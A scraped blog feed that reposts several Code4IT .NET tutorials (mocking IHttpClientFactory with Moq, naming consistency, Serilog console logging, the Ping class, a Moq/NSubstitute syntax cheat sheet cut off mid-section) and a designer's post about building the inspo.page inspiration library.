نویسنده: post Bina

  • How to test HttpClientFactory with Moq


    Mocking IHttpClientFactory is hard, but luckily we can use some advanced features of Moq to write better tests.

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    When working on any .NET application, one of the most common things you’ll see is using dependency injection to inject an IHttpClientFactory instance into the constructor of a service. And, of course, you should test that service. To write good unit tests, it is a good practice to mock the dependencies to have full control over their behavior. A well-known library to mock dependencies is Moq; integrating it is pretty simple: if you have to mock a dependency of type IMyService, you can create mocks of it by using Mock<IMyService>.

    But here comes a problem: mocking IHttpClientFactory is not that simple: just using Mock<IHttpClientFactory> is not enough.

    In this article, we will learn how to mock IHttpClientFactory dependencies, how to define the behavior for HTTP calls, and finally, we will deep dive into the advanced features of Moq that allow us to mock that dependency. Let’s go!

    Introducing the issue

    To fully understand the problem, we need a concrete example.

    The following class implements a service with a method that, given an input string, sends it to a remote client using a DELETE HTTP call:

    public class MyExternalService
    {
        private readonly IHttpClientFactory _httpClientFactory;
    
        public MyExternalService(IHttpClientFactory httpClientFactory)
        {
            _httpClientFactory = httpClientFactory;
        }
    
        public async Task DeleteObject(string objectName)
        {
            string path = $"/objects?name={objectName}";
            var client = _httpClientFactory.CreateClient("ext_service");
    
            var httpResponse = await client.DeleteAsync(path);
    
            httpResponse.EnsureSuccessStatusCode();
        }
    }
    

    The key point to notice is that we are injecting an instance of IHttpClientFactory; we are also creating a new HttpClient every time it’s needed by using _httpClientFactory.CreateClient("ext_service").

    As you may know, you should not instantiate new HttpClient objects every time to avoid the risk of socket exhaustion (see links below).

    There is a huge problem with this approach: it’s not easy to test it. You cannot simply mock the IHttpClientFactory dependency, but you have to manually handle the HttpClient and keep track of its internals.

    Of course, we will not use real IHttpClientFactory instances: we don’t want our application to perform real HTTP calls. We need to mock that dependency.

    Think of mocked dependencies as movies stunt doubles: you don’t want your main stars to get hurt while performing action scenes. In the same way, you don’t want your application to perform actual operations when running tests.

    Creating mocks is like using stunt doubles for action scenes

    We will use Moq to test the method and check that the HTTP call is correctly adding the objectName variable in the query string.

    How to create mocks of IHttpClientFactory with Moq

    Let’s begin with the full code for the creation of mocked IHttpClientFactorys:

    var handlerMock = new Mock<HttpMessageHandler>(MockBehavior.Strict);
    
    HttpResponseMessage result = new HttpResponseMessage();
    
    handlerMock
        .Protected()
        .Setup<Task<HttpResponseMessage>>(
            "SendAsync",
            ItExpr.IsAny<HttpRequestMessage>(),
            ItExpr.IsAny<CancellationToken>()
        )
        .ReturnsAsync(result)
        .Verifiable();
    
    var httpClient = new HttpClient(handlerMock.Object) {
            BaseAddress = new Uri("https://www.code4it.dev/")
        };
    
    var mockHttpClientFactory = new Mock<IHttpClientFactory>();
    
    mockHttpClientFactory.Setup(_ => _.CreateClient("ext_service")).Returns(httpClient);
    
    service = new MyExternalService(mockHttpClientFactory.Object);
    

    A lot of stuff is going on, right?

    Let’s break it down to fully understand what all those statements mean.

    Mocking HttpMessageHandler

    The first instruction we meet is

    var handlerMock = new Mock<HttpMessageHandler>(MockBehavior.Strict);
    

    What does it mean?

    HttpMessageHandler is the fundamental part of every HTTP request in .NET: it performs a SendAsync call to the specified endpoint with all the info defined in a HttpRequestMessage object passed as a parameter.

    Since we are interested in what happens to the HttpMessageHandler, we need to mock it and store the result in a variable.

    Have you noticed that MockBehavior.Strict? This is an optional parameter that makes the mock throw an exception when it doesn’t have a corresponding setup. To try it, remove that argument to the constructor and comment out the handlerMock.Setup() part: when you’ll run the tests, you’ll receive an error of type Moq.MockException.

    Next step: defining the behavior of the mocked HttpMessageHandler

    Defining the behavior of HttpMessageHandler

    Now we have to define what happens when we use the handlerMock object in any HTTP operation:

    HttpResponseMessage result = new HttpResponseMessage();
    
    handlerMock
        .Protected()
        .Setup<Task<HttpResponseMessage>>(
            "SendAsync",
            ItExpr.IsAny<HttpRequestMessage>(),
            ItExpr.IsAny<CancellationToken>()
        )
        .ReturnsAsync(result)
        .Verifiable();
    

    The first thing we meet is that Protected(). Why?

    To fully understand why we need it, and what is the meaning of the next operations, we need to have a look at the definition of HttpMessageHandler:

    // Summary: A base type for HTTP message handlers.
    public abstract class HttpMessageHandler : IDisposable
    {
        /// Other stuff here...
    
        // Summary: Send an HTTP request as an asynchronous operation.
        protected internal abstract Task<HttpResponseMessage> SendAsync(
            HttpRequestMessage request,
            CancellationToken cancellationToken);
    }
    

    From this snippet, we can see that we have a method, SendAsync, which accepts an HttpRequestMessage object and a CancellationToken, and which is the one that deals with HTTP requests. But this method is protected. Therefore we need to use Protected() to access the protected methods of the HttpMessageHandler class, and we must set them up by using the method name and the parameters in the Setup method.

    With Protected() you can access protected members

    Two details to notice, then:

    • We specify the method to set up by using its name as a string: “SendAsync”
    • To say that we don’t care about the actual values of the parameters, we use ItExpr instead of It because we are dealing with the setup of a protected member.

    If SendAsync was a public method, we would have done something like this:

    handlerMock
        .Setup(_ => _.SendAsync(
            It.IsAny<HttpRequestMessage>(), It.IsAny<CancellationToken>())
        );
    

    But, since it is a protected method, we need to use the way I listed before.

    Then, we define that the call to SendAsync returns an object of type HttpResponseMessage: here we don’t care about the content of the response, so we can leave it in this way without further customizations.

    Creating HttpClient

    Now that we have defined the behavior of the HttpMessageHandler object, we can pass it to the HttpClient constructor to create a new instance of HttpClient that acts as we need.

    var httpClient = new HttpClient(handlerMock.Object) {
            BaseAddress = new Uri("https://www.code4it.dev/")
        };
    

    Here I’ve set up the value of the BaseAddress property to a valid URI to avoid null references when performing the HTTP call. You can use even non-existing URLs: the important thing is that the URL must be well-formed.

    Configuring the IHttpClientFactory instance

    We are finally ready to create the IHttpClientFactory!

    var mockHttpClientFactory = new Mock<IHttpClientFactory>();
    
    mockHttpClientFactory.Setup(_ => _.CreateClient("ext_service")).Returns(httpClient);
    
    var service = new MyExternalService(mockHttpClientFactory.Object);
    

    So, we create the Mock of IHttpClientFactory and define the instance of HttpClient that will be returned when calling CreateClient("ext_service"). Finally, we’re passing the instance of IHttpClientFactory to the constructor of MyExternalService.

    How to verify the calls performed by IHttpClientFactory

    Now, suppose that in our test we’ve performed the operation under test.

    // setup IHttpClientFactory
    await service.DeleteObject("my-name");
    

    How can we check if the HttpClient actually called an endpoint with “my-name” in the query string? As before, let’s look at the whole code, and then let’s analyze every part of it.

    // verify that the query string contains "my-name"
    
    handlerMock.Protected()
     .Verify(
        "SendAsync",
        Times.Exactly(1), // we expected a single external request
        ItExpr.Is<HttpRequestMessage>(req =>
            req.RequestUri.Query.Contains("my-name")// Query string contains my-name
        ),
        ItExpr.IsAny<CancellationToken>()
        );
    

    Accessing the protected instance

    As we’ve already seen, the object that performs the HTTP operation is the HttpMessageHandler, which here we’ve mocked and stored in the handlerMock variable.

    Then we need to verify what happened when calling the SendAsync method, which is a protected method; thus we use Protected to access that member.

    Checking the query string

    The core part of our assertion is this:

    ItExpr.Is<HttpRequestMessage>(req =>
        req.RequestUri.Query.Contains("my-name")// Query string contains my-name
    ),
    

    Again, we are accessing a protected member, so we need to use ItExpr instead of It.

    The Is<HttpRequestMessage> method accepts a function Func<HttpRequestMessage, bool> that we can use to determine if a property of the HttpRequestMessage under test – in our case, we named that variable as req – matches the specified predicate. If so, the test passes.

    Refactoring the code

    Imagine having to repeat that code for every test method in your class – what a mess!

    So we can refactor it: first of all, we can move the HttpMessageHandler mock to the SetUp method:

    [SetUp]
    public void Setup()
    {
        this.handlerMock = new Mock<HttpMessageHandler>(MockBehavior.Strict);
    
        HttpResponseMessage result = new HttpResponseMessage();
    
        this.handlerMock
        .Protected()
        .Setup<Task<HttpResponseMessage>>(
            "SendAsync",
            ItExpr.IsAny<HttpRequestMessage>(),
            ItExpr.IsAny<CancellationToken>()
        )
        .Returns(Task.FromResult(result))
        .Verifiable()
        ;
    
        var httpClient = new HttpClient(handlerMock.Object) {
            BaseAddress = new Uri("https://www.code4it.dev/")
            };
    
        var mockHttpClientFactory = new Mock<IHttpClientFactory>();
    
        mockHttpClientFactory.Setup(_ => _.CreateClient("ext_service")).Returns(httpClient);
    
        this.service = new MyExternalService(mockHttpClientFactory.Object);
    }
    

    and keep a reference to handlerMock and service in some private members.

    Then, we can move the assertion part to a different method, maybe to an extension method:

    public static void Verify(this Mock<HttpMessageHandler> mock, Func<HttpRequestMessage, bool> match)
    {
        mock.Protected().Verify(
            "SendAsync",
            Times.Exactly(1), // we expected a single external request
            ItExpr.Is<HttpRequestMessage>(req => match(req)
            ),
            ItExpr.IsAny<CancellationToken>()
        );
    }
    

    So that our test can be simplified to just a bunch of lines:

    [Test]
    public async Task Method_Should_ReturnSomething_When_Condition()
    {
        //Arrange occurs in the SetUp phase
    
        //Act
        await service.DeleteObject("my-name");
    
        //Assert
        handlerMock.Verify(r => r.RequestUri.Query.Contains("my-name"));
    }
    

    Further readings

    🔗 Example repository | GitHub

    🔗 Why we need HttpClientFactory | Microsoft Docs

    🔗 HttpMessageHandler class | Microsoft Docs

    🔗 Mock objects with static, complex data by using Manifest resources | Code4IT

    🔗 Moq documentation | GitHub

    🔗 How you can create extension methods in C# | Code4IT

    Wrapping up

    In this article, we’ve seen how tricky it can be to test services that rely on IHttpClientFactory instances. Luckily, we can rely on tools like Moq to mock the dependencies and have full control over the behavior of those dependencies.

    Mocking IHttpClientFactory is hard, I know. But here we’ve found a way to overcome those difficulties and make our tests easy to write and to understand.

    There are lots of NuGet packages out there that help us mock that dependency: do you use any of them? What is your favourite, and why?

    Happy coding!

    🐧



    Source link

  • The Journey Behind inspo.page: A Better Way to Collect Web Design Inspiration

    The Journey Behind inspo.page: A Better Way to Collect Web Design Inspiration



    Have you ever landed on a website and thought, “Wow, this is absolutely beautiful”? You know that feeling when every little animation flows perfectly, when clicking a button feels satisfying, when the whole experience just feels premium.

    That’s exactly what happened to me a few years ago, and it changed everything.

    The Moment Everything Clicked

    I was browsing the web when I stumbled across one of those websites. You know the type where every micro-animation has been crafted with care, where every transition feels intentional. It wasn’t just pretty; it made me feel something.

    That’s when I got hooked on web design.

    But here’s the thing: I wanted to create websites like that too. I wanted to capture that same magic, those same emotions. So I started doing what any curious designer does. I began collecting inspiration.

    Spotting a Gap

    At first, I used the usual inspiration websites. They’re fantastic for discovering beautiful sites and getting that creative spark. But I noticed something: they showed you the whole website, which is great for overall inspiration.

    The thing is, sometimes I’d get obsessed with just one specific detail. Maybe it was a button animation, or how an accordion opened, or a really smooth page transition. I’d bookmark the entire site, but then later I’d spend ages trying to find that one perfect element again.

    I started thinking there might be room for something more specific. Something where you could find inspiration at the component level, not just the full-site level.

    Starting Small

    So I started building my own library. Whenever I saw something cool (a smooth page transition, an elegant pricing section, a cool navigation animation) I’d record it and save it with really specific tags like “card,” “hero section,” or “page transition.”

    Early versions of my local library I had on Eagle

    Real, useful categories that actually helped me find what I needed later. I did this for years. It became my secret weapon for client projects and personal work.

    From Personal Tool to Public Resource

    After a few years of building this personal collection, I had a thought: “If this helps me so much, maybe other designers and developers could use it too.”

    That’s when I decided I should share this with the world. But I didn’t want to just dump my library online and call it a day. It was really important to me that people could filter stuff easily, that it would be intuitive, and that it would work well on both mobile and desktop. I wanted it to look good and actually be useful.

    Early version of inspo.page, filters where not sticky at the bottom

    That’s how inspo.page was born.

    How It Actually Works

    The idea behind inspo.page is simple: instead of broad categories, I built three specific filter systems:

    • What – All the different components and layouts. Looking for card designs? Different types of lists? Different types of modals? It’s all here.
    • Where – Sections of websites. Need inspiration for a hero section? A pricing page? Social proof section? Filter by where it appears on a website.
    • Motion – Everything related to movement. Page transitions, parallax effects, hover animations.

    The magic happens when you combine these filters. Want to see card animations specifically for pricing sections? Or parallax effects used for presenting services? Just stack the filters and get exactly what you’re looking for.

    The Technical Side

    On the technical side, I’m using Astro and Sanity. Because I’m sometimes lazy and I really wanted a project that’s future-proof, I wanted to make it as simple as possible for me to curate inspiration.

    That’s why I came up with this automation system where I just hit record and that’s it. It automatically grabs the URL, creates different video versions, compresses everything, hosts it to Bunny.net, and then sends it to the CMS so I just have to tag it and publish.

    Tagging system inside Sanity

    I really wanted to find a system that makes it as easy as possible for me to do what I want to do because I knew if there was too much resistance, I’d eventually stop doing it.

    The Hardest Part

    You’d probably think the hardest part was all the technical stuff like setting up automations and managing video uploads. But honestly, that was the easy part.

    The real challenge was figuring out how to organize everything so people could actually find what they’re looking for.

    I must have redesigned the entire tagging system at least 10 times. Every time I thought I had it figured out, I’d realize it was either way too complicated or way too vague. Too many specific tags and people get overwhelmed scrolling through endless options. Too few broad categories and everything just gets lumped together uselessly.

    It’s this weird balancing act. You need enough categories to be helpful, but not so many that people give up before they even start filtering. And the categories have to make sense to everyone, not just me.

    I think I’ve got a system now that works pretty well, but it might change in the future. If users tell me there’s a better way to organize things, I’m really all ears because honestly, it’s a difficult problem to solve. Even though I have something that seems to work now, there might be a much better approach out there.

    The Human Touch in an AI World

    Here’s something I think about a lot: AI can build a decent-looking website in minutes now. Seriously, it’s pretty impressive.

    But there’s still something missing. AI can handle layouts and basic styling, but it can’t nail the human stuff yet. Things like the timing of a hover effect, the weight of a transition, or knowing exactly how a micro-interaction should feel. That’s pure taste and intuition.

    Those tiny details are what make websites feel alive instead of just functional. And in a world where anyone can generate a website in 5 minutes, those details are becoming more valuable than ever.

    That’s exactly where inspo.page comes in. It helps you find inspiration for the things that separate good websites from unforgettable ones.

    What’s Next

    Every week, I’m adding more inspiration to the platform. I’m not trying to build the biggest collection out there, just something genuinely useful. If I can help a few designers and developers find that perfect animation a little bit faster, then I’m happy.

    Want to check it out? Head over to inspo.page and see if you can find your next favorite interaction. You can filter by specific components (like cards, buttons, modals, etc.), website sections (hero, pricing, etc.), or motion patterns (parallax, page transitions, you name it).

    And if you stumble across a website with some really nice animations or micro-interactions, feel free to share it using the feedback button (top right) on the site. I’m always on the lookout for inspiration pieces that have that special touch. Can’t promise I’ll add everything, but I definitely check out what people send.

    Hope you find something that sparks your next great design!



    Source link

  • use the same name for the same concept | Code4IT


    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    As I always say, naming things is hard. We’ve already talked about this in a previous article.

    By creating a simple and coherent dictionary, your classes will have better names because you are representing the same idea with the same name. This improves code readability and searchability. Also, by simply looking at the names of your classes you can grasp the meaning of them.

    Say that we have 3 objects that perform similar operations: they download some content from external sources.

    class YouTubeDownloader {    }
    
    class TwitterDownloadManager {    }
    
    class FacebookDownloadHandler {    }
    

    Here we are using 3 words to use the same concept: Downloader, DownloadManager, DownloadHandler. Why??

    So, if you want to see similar classes, you can’t even search for “Downloader” on your IDE.

    The solution? Use the same name to indicate the same concept!

    class YouTubeDownloader {    }
    
    class TwitterDownloader {    }
    
    class FacebookDownloader {    }
    

    It’s as simple as that! Just a small change can drastically improve the readability and usability of your code!

    So, consider also this small kind of issue when reviewing PRs.

    Conclusion

    A common dictionary helps to understand the code without misunderstandings. Of course, this tip does not refer only to class names, but to variables too. Avoid using synonyms for objects (eg: video and clip). Instead of synonyms, use more specific names (YouTubeVideo instead of Video).

    Any other ideas?

    👉 Let’s discuss it on Twitter or on the comment section below!

    🐧





    Source link

  • How to log to Console with .NET Core and Serilog | Code4IT


    Serilog is a famous logger for .NET projects. In this article, we will learn how to integrate it in a .NET API project and output the logs on a Console.

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    Having meaningful logs is crucial for any application: without logs, we would not be able to see if errors occur, what’s the status of the application, if there are strange behaviors that should worry us, and so on.

    To define a good logging strategy, we need two parts, equally important: adding logs to our code and analyzing the data produced by our logs.

    In this article, we will see how to add Serilog, a popular logger library, to our .NET projects: we will learn how to configure it to print the logs on a Console.

    Why logging on console

    I can guess what you’re thinking:

    why should we write logs on Console? We should store them somewhere, to analyze them!

    And… you’d be right!

    But still, printing logs on Console can be useful in many ways.

    First of all, by printing on Console you can check that the logging is actually working, and you haven’t missed a configuration.

    Then, writing on Console is great when debugging locally: just spin up your application, run the code you need, and check what happened on the logs; in this way you can understand the internal state of the application, which warnings and errors occurred, and more.

    Lastly, because of an odd strategy that I’ve seen implemented in many projects: print the logs on console, add an agent that reads them and stores them in memory, and then send all the logs to the destination platform at once; in this way, you’ll perform fewer HTTP requests against those platforms, making you save money and avoiding reaching the connection limit of the destination platform.

    Now that we have good reasons to log on Console, well… let’s do it!

    Adding Serilog on Program class

    For this article, we will add Serilog logs to a simple .NET API project.

    Create a new API project – you know, the one with the WeatherForecast controller.

    Then, navigate to the Program class: by default, it should look like this:

    public class Program
    {
        public static void Main(string[] args)
        {
            CreateHostBuilder(args).Build().Run();
        }
    
        public static IHostBuilder CreateHostBuilder(string[] args) =>
            Host.CreateDefaultBuilder(args)
            .ConfigureWebHostDefaults(webBuilder =>
            {
                webBuilder.UseStartup<Startup>();
            });
    }
    

    There are no references to any logger, and, of course, to Serilog.

    So the first thing to do is to install it: via NuGet install Serilog.AspNetCore and Serilog.Extensions.Logging. The first one allows you to add Serilog to an ASP.NET project, while the second one allows you to use the native .NET logger in the code with all the capabilities provided by Serilog.

    Then, we need to add the logger to our project:

    public class Program
    {
        public static void Main(string[] args)
        {
    +        Log.Logger = new LoggerConfiguration()
    +                .CreateLogger();
    
            CreateHostBuilder(args).Build().Run();
        }
    
        public static IHostBuilder CreateHostBuilder(string[] args) =>
            Host.CreateDefaultBuilder(args)
    +        .UseSerilog((hostingContext, loggerConfiguration) =>
    +                    loggerConfiguration.ReadFrom.Configuration(hostingContext.Configuration))
                .ConfigureWebHostDefaults(webBuilder =>
                {
                    webBuilder.UseStartup<Startup>();
                });
    }
    

    There are two snippets to understand:

    Log.Logger = new LoggerConfiguration().CreateLogger();
    

    creates a new logger with the specified configurations (in our case, we use the default values), and then assigns the newly created logger to the globally-shared logger Log.Logger.

    Log.Logger lives in the Serilog namespace, so you have to add it to the using list.

    Then, we have this second part:

    .UseSerilog((hostingContext, loggerConfiguration) =>
            loggerConfiguration.ReadFrom.Configuration(hostingContext.Configuration)
        )
    

    This snippet defines where to get the Serilog configurations (in this case, from the same place used by the hosting context), and then sets Serilog as the logging provider.

    Inject the logger into constructors

    Since we have bound the Serilog logger to the one native on .NET – the one coming from Microsoft.Extensions.Logging – we can use the native logger everywhere in the project.

    Add a dependency to ILogger<T> in your constructor, where T is the name of the class itself:

    public class WeatherForecastController : ControllerBase
    {
    
        private readonly ILogger<WeatherForecastController> _logger;
    
        public WeatherForecastController(ILogger<WeatherForecastController> logger)
        {
            _logger = logger;
        }
    }
    

    So that you can use the different levels of logging and the Structured Data (see links below) to add more info:

    _logger.LogInformation("Getting random items. There are {AvailableItems} possible values", Summaries.Count());
    
    _logger.LogWarning("This is a warning");
    
    try
    {
        throw new ArgumentException();
    }
    catch (Exception ex)
    {
        _logger.LogError(ex, "And this is an error");
    }
    

    Update the AppSettings file

    But that’s not enough. We aren’t saying that our logs should be printed on Console. To do that, we must update the appsettings.json file and add some new configurations.

    "Serilog": {
        "Using": [ "Serilog.Sinks.Console" ],
        "MinimumLevel": {
            "Default": "Verbose",
            "Override": {
                "Microsoft": "Warning",
                "Microsoft.AspNetCore": "Warning",
                "System": "Error"
            }
        },
        "WriteTo": [
            {
            "Name": "Async",
            "Args": {
                "configure": [
                {
                    "Name": "Console",
                    "Args": {
                        "formatter": "Serilog.Formatting.Compact.RenderedCompactJsonFormatter, Serilog.Formatting.Compact"
                    }
                }
                ]
            }
            }
        ]
    }
    

    As usual, let’s break it down.

    The first thing to notice is the root of the JSON section: Serilog. This value is the default when defining the configuration values for Serilog (remember the loggerConfiguration.ReadFrom.Configuration(hostingContext.Configuration)? It binds the settings automagically!)

    The Using section defines the types of Sinks that will be used. A Sink is just the destination of the logs. So, just download the Serilog.Sinks.Console NuGet package and add that value to the Using array to use the Console as a Sink.

    Then, we have the MinimumLevel object: it defines the minimum levels of logs that will be taken into consideration. Here the default value is Verbose, but you’ll probably want it to be Warning in your production environment: is this way, all the logs with a level lower than Warning will be ignored.

    Lastly, we have the WriteTo section, which defines the exact configurations of the sinks. Notice the Async value: we need this value because writing logs is an asynchronous operation – logs must be printed in real-time. So, after you’ve installed the Serilog.Sinks.Async NuGet package, you must add the Async value to that object. And then you can configure the different Sinks: here I’m adding some simple JSON Formatters to the Console Sink.

    Run the application

    We’re finally ready to run our application.

    Just run it with the usual IIS profile and… nothing happens! Where is the Console??

    With IIS you cannot see any Console, since it simply does not exist – if the application runs as a web application, we don’t need the Console.

    So, you have to change the running profile and select the name of your application (in my case, SerilogLoggingOnConsole).

    Use the correct running profile

    Then you can run the application, navigate to an endpoint, and see the logs!

    Serilog logs as plain text

    But I don’t like how logs are displayed, too many details!

    Let me add a theme: in the AppSettings file, I can add a theme configuration:

    "Args": {
        "configure": [
        {
            "Name": "Console",
            "Args": {
    +        "theme": "Serilog.Sinks.SystemConsole.Themes.AnsiConsoleTheme::Code, Serilog.Sinks.Console",
            "formatter": "Serilog.Formatting.Compact.RenderedCompactJsonFormatter, Serilog.Formatting.Compact"
            }
        }
        ]
    }
    

    This makes Serilog show the logs with a different shape:

    Serilog logs with a simple theme

    So, just by updating the AppSettings file, you can fine-tune the behavior and the output of the logger. In this way, you can customize Release builds to update the AppSettings file and define custom properties for every deploy environment.

    Further reading

    If you want to learn more about the different topics discussed in this article:

    🔗 Serilog Structured Data | Code4IT

    🔗 Serilog Console Sink | GitHub

    🔗 How to integrate Serilog and Seq | Code4IT

    Wrapping up

    In this article, we’ve seen how to integrate Serilog in a .NET application to print the logs on the application Console.

    Time to recap the key points:

    • install the Serilog, Serilog.AspNetCore, and Serilog.Extensions.Logging NuGet packages to integrate the basic functionalities of Serilog
    • download the Serilog.Sinks.Console and Serilog.Sinks.Async NuGet packages to use the Console as a destination of your logs
    • update the Program class to specify that the application must use Serilog
    • use ILogger<T> instead of Serilog.ILogger
    • define the settings in the appsettings.json file instead of directly in the code

    Finally, if you want to see the full example, here’s the GitHub repository used for this article

    Happy coding!

    🐧



    Source link

  • C# Tip: use the Ping class instead of an HttpClient to ping an endpoint

    C# Tip: use the Ping class instead of an HttpClient to ping an endpoint


    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    What if you wanted to see if a remote website is up and running?

    Probably, the first thing that may come to your mind is to use a common C# class: HttpClient. But it may cause you some trouble.

    There is another way to ping an endpoint: using the Ping class.

    Why not using HttpClient

    Say that you need to know if the host at code4it.dev is live. With HttpClient you might use something like this:

    async Task Main()
    {
        var url = "https://code4it.dev";
    
        var isUp = await IsWebsiteUp_Get(url);
    
        Console.WriteLine("The website is {0}", isUp ? "up" : "down");
    }
    
    private async Task<bool> IsWebsiteUp_Get(string url)
    {
        var httpClient = new HttpClient(); // yes, I know, I should use HttpClientFactory!
        var httpResponse = await httpClient.GetAsync(url);
        return httpResponse.IsSuccessStatusCode;
    }
    

    There are some possible issues with this approach: what if there is no resource available in the root? You will have to define a specific path. And what happens if the defined resource is under authentication? IsWebsiteUp_Get will always return false. Even when the site is correctly up.

    Also, it is possible that the endpoint does not accept HttpGet requests. So, we can use HttpHead instead:

    private async Task<bool> IsWebsiteUp_Head(string url)
    {
        var httpClient = new HttpClient();
        HttpRequestMessage request = new HttpRequestMessage
        {
            RequestUri = new Uri(url),
            Method = HttpMethod.Head // Not GET, but HEAD
        };
        var result = await httpClient.SendAsync(request);
        return result.IsSuccessStatusCode;
    }
    

    We have the same issues described before, but at least we are not bound to a specific HTTP verb.

    By the way, we need to find another way.

    How to use Ping

    By using the Ping class, we can get rid of those checks and evaluate the status of the Host, not of a specific resource.

    private async Task<bool> IsWebsiteUp_Ping(string url)
    {
        Ping ping = new Ping();
        var hostName = new Uri(url).Host;
    
        PingReply result = await ping.SendPingAsync(hostName);
        return result.Status == IPStatus.Success;
    }
    

    The Ping class comes in the System.Net.NetworkInformation namespace, and allows you to perform the same operations of the ping command you usually send via command line.

    Conclusion

    We’ve seen why you should use Ping instead of HttpClient to perform a ping-like operation.

    There’s more than this: head to this more complete article to learn more.

    👉 Let’s discuss it on Twitter or on the comment section below.

    🐧





    Source link

  • syntax cheat sheet | Code4IT


    Moq and NSubstitute are two of the most used library to mock dependencies on your Unit Tests. How do they differ? How can we move from one library to the other?

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    When writing Unit Tests, you usually want to mock dependencies. In this way, you can define the behavior of those dependencies, and have full control of the system under test.

    For .NET applications, two of the most used mocking libraries are Moq and NSubstitute. They allow you to create and customize the behavior of the services injected into your classes. Even though they have similar functionalities, their syntax is slightly different.

    In this article, we will learn how the two libraries implement the most used functionalities; in this way, you can easily move from one to another if needed.

    A real-ish example

    As usual, let’s use a real example.

    For this article, I’ve created a dummy class, StringsWorker, that does nothing but call another service, IStringUtility.

    public class StringsWorker
    {
        private readonly IStringUtility _stringUtility;
    
        public StringsWorker(IStringUtility stringUtility)
            => _stringUtility = stringUtility;
    
        public string[] TransformArray(string[] items)
            => _stringUtility.TransformAll(items);
    
        public string[] TransformSingleItems(string[] items)
            => items.Select(i => _stringUtility.Transform(i)).ToArray();
    
        public string TransformString(string originalString)
            => _stringUtility.Transform(originalString);
    }
    

    To test the StringsWorker class, we will mock its only dependency, IStringUtility. This means that we won’t use a concrete class that implements IStringUtility, but rather we will use Moq and NSubstitute to mock it, defining its behavior and simulating real method calls.

    Of course, to use the two libraries, you have to install them in each tests project.

    How to define mocked dependencies

    The first thing to do is to instantiate a new mock.

    With Moq, you create a new instance of Mock<IStringUtility>, and then inject its Object property into the StringsWorker constructor:

    private Mock<IStringUtility> moqMock;
    private StringsWorker sut;
    
    public MoqTests()
    {
        moqMock = new Mock<IStringUtility>();
        sut = new StringsWorker(moqMock.Object);
    }
    

    With NSubstitute, instead, you declare it with Substitute.For<IStringUtility>() – which returns an IStringUtility, not wrapped in any class – and then you inject it into the StringsWorker constructor:

    private IStringUtility nSubsMock;
    private StringsWorker sut;
    
    public NSubstituteTests()
    {
        nSubsMock = Substitute.For<IStringUtility>();
        sut = new StringsWorker(nSubsMock);
    }
    

    Now we can customize moqMock and nSubsMock to add behaviors and verify the calls to those dependencies.

    Define method result for a specific input value: the Return() method

    Say that we want to customize our dependency so that, every time we pass “ciao” as a parameter to the Transform method, it returns “hello”.

    With Moq we use a combination of Setup and Returns.

    moqMock.Setup(_ => _.Transform("ciao")).Returns("hello");
    

    With NSubstitute we don’t use Setup, but we directly call Returns.

    nSubsMock.Transform("ciao").Returns("hello");
    

    Define method result regardless of the input value: It.IsAny() vs Arg.Any()

    Now we don’t care about the actual value passed to the Transform method: we want that, regardless of its value, the method always returns “hello”.

    With Moq, we use It.IsAny<T>() and specify the type of T:

    moqMock.Setup(_ => _.Transform(It.IsAny<string>())).Returns("hello");
    

    With NSubstitute, we use Arg.Any<T>():

    nSubsMock.Transform(Arg.Any<string>()).Returns("hello");
    

    Define method result based on a filter on the input: It.Is() vs Arg.Is()

    Say that we want to return a specific result only when a condition on the input parameter is met.

    For example, every time we pass a string that starts with “IT” to the Transform method, it must return “ciao”.

    With Moq, we use It.Is<T>(func) and we pass an expression as an input.

    moqMock.Setup(_ => _.Transform(It.Is<string>(s => s.StartsWith("IT")))).Returns("ciao");
    

    Similarly, with NSubstitute, we use Arg.Is<T>(func).

    nSubsMock.Transform(Arg.Is<string>(s => s.StartsWith("IT"))).Returns("ciao");
    

    Small trivia: for NSubstitute, the filter is of type Expression<Predicate<T>>, while for Moq it is of type Expression<Func<TValue, bool>>: don’t worry, you can write them in the same way!

    Throwing exceptions

    Since you should test not only happy paths, but even those where an error occurs, you should write tests in which the injected service throws an exception, and verify that that exception is handled correctly.

    With both libraries, you can throw a generic exception by specifying its type:

    //Moq
    moqMock.Setup(_ => _.TransformAll(null)).Throws<ArgumentException>();
    
    //NSubstitute
    nSubsMock.TransformAll(null).Throws<ArgumentException>();
    

    You can also throw a specific exception instance – maybe because you want to add an error message:

    var myException = new ArgumentException("My message");
    
    //Moq
    moqMock.Setup(_ => _.TransformAll(null)).Throws(myException);
    
    //NSubstitute
    nSubsMock.TransformAll(null).Throws(myException);
    

    If you don’t want to handle that exception, but you want to propagate it up, you can verify it in this way:

    Assert.Throws<ArgumentException>(() => sut.TransformArray(null));
    

    Verify received calls: Verify() vs Received()

    Sometimes, to understand if the code follows the execution paths as expected, you might want to verify that a method has been called with some parameters.

    To verify it, you can use the Verify method on Moq.

    moqMock.Verify(_ => _.Transform("hello"));
    

    Or, if you use NSubstitute, you can use the Received method.

    nSubsMock.Received().Transform("hello");
    

    Similar as we’ve seen before, you can use It.IsAny, It.Is, Arg.Any and Arg.Is to verify some properties of the parameters passed as input.

    Verify the exact count of received calls

